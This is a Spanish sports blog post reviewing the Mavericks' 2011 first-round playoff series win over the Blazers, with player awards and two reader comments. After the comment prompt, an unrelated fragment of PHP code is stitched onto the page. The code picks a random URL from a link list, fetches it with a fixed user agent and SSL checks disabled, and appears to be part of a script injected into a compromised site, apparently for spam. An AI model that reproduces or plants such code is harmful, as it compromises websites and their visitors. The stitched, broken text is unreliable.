Primera ronda del Oeste: Mavs 4 – Blazers 2

30 de April de 2011 por TheDeerHunter

No nos haríamos ricos al apostar que McMillan no iba a pasar de primera ronda con los Blazers tampoco este año. Sea por los motivos que sean, no se pagaba mucho por esa jugada. Que si no está Oden ni se le espera, que Roy es un jugador lesionado que intenta (a veces con éxito) parecer que no lo está, que Rudy no sirve ni para 10 minutos y tirarse un par de tiros desde las esquinas, que Batum deja mágicamente de ser insustituible para convertirse en intrascendente, que André Miller no es el base defensivo que le mola al técnico, que Wallace es novato en el equipo, que Camby es más ex que otra cosa, que hace falta más músculo, que no se pudo fichar a Turkoglu cuando lo intentaron… Y en los comentarios podréis todos añadir todas las razones que se os pasen por la cabeza. El caso es que no se ha ganado ni una ronda de playoffs todos estos años ni hay demasiadas esperanzas de que lo logren a medio plazo. Es así de triste.

Mala suerte también es que toque un rival de la talla de los Mavericks, uno de los grandes animadores de la regular, con un líder tan demoledor como Dirk Nowitzki. Ante ellos tiene mucho mérito minimizar su producción ofensiva en 7 puntos. Ya es el culmen de la fortuna adversa que a un equipo acostumbrado a encajar 96 puntos por partido en la regular sólo seas capaz de anotarle 88. Casualmente 8 menos que los promedios propios. Una lástima probablemente casual.

Los roles en los Mavericks han estado perfectamente definidos. Los minutajes matemáticamente repartidos y, da la sensación, que de una plantilla a priori envejecida, se ha sacado el máximo partido posible de cada uno de sus componentes. Además del talento ofensivo de Nowitzki y Terry, y de la garra de Chandler, hemos vuelto a disfrutar de grandes momentos de Kidd, de Marion e incluso de Stojakovic. Punto para Carlisle.

Por sus rivales nos quedamos con la culminación de un gran año de Aldridge como nuevo capo de este equipo. Las gratas impresiones de Gerald Wallace, algún destello de Miller o Matthews, los arreones de Roy… Pero poco más. A esperar al año que viene por si suena la flauta y si no reconstrucción. Nadie mejor para sentar esos cimientos que Nate McMillan…

PREMIOS

MVP: Tan cierto como que los Blazers no pasan de la 1ª ronda es que Dirk Nowitzki te va a hacer polvo. El alemán sigue siendo uno de los mejores cañoneros de la liga. 27 puntos, 8 rebotes 3 asistencias. Maravilloso.

Sorpresa: A pesar de sus problemas Brandon Roy todavía es capaz de brindarnos algún momento inolvidable. Momentos míticos que tan especial hacen a esta competición. La remontada en el 4º partido de esta serie debería pasar a la historia y ser repetidamente visionada por todo aquel que ame este espectáculo.

Decepción: Con Rudy completamente desahuciado a estas alturas surge una nueva cabeza de turco en Portland. Nico Batum… estás en el punto de mira.

Esfuerzo en vano: El nuevo líder de los Blazers, LaMarcus Aldridge, cierra su excelente temporada a lo grande en lo individual. 21 puntos, 7.5 rebotes… exquisito.

Comenta

2 comentarios a esta entrada

  1. olarte dice:
    #1

    Rudy va a la deriva….tantas esperanzas que tenia depositadas en el y nada y si encima Roy que podria remediar lo malo que hace el va y esta cada vez peor.No tienen buena pinta estos Blazers.La unica parte positiva Aldridge

      Citar

  2. Ru dice:
    #2

    Rudy debería dejarse de vivir del cuento y volver a Europa a consagrarse de nuevo.Yo ya estoy cansado de las pataletas que salen cada poco en la prensa y visto lo visto en estos PO y con la amenaza del lockout en “cero coma” estaremos en las mismas.

    Sobre la eliminatoria pensaba que iba a llegar hasta el 7º y que pasarían los Blazers,eso si,más bien por la historia ceniza de los Mavs que por méritos propios del equipo de McMillan.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>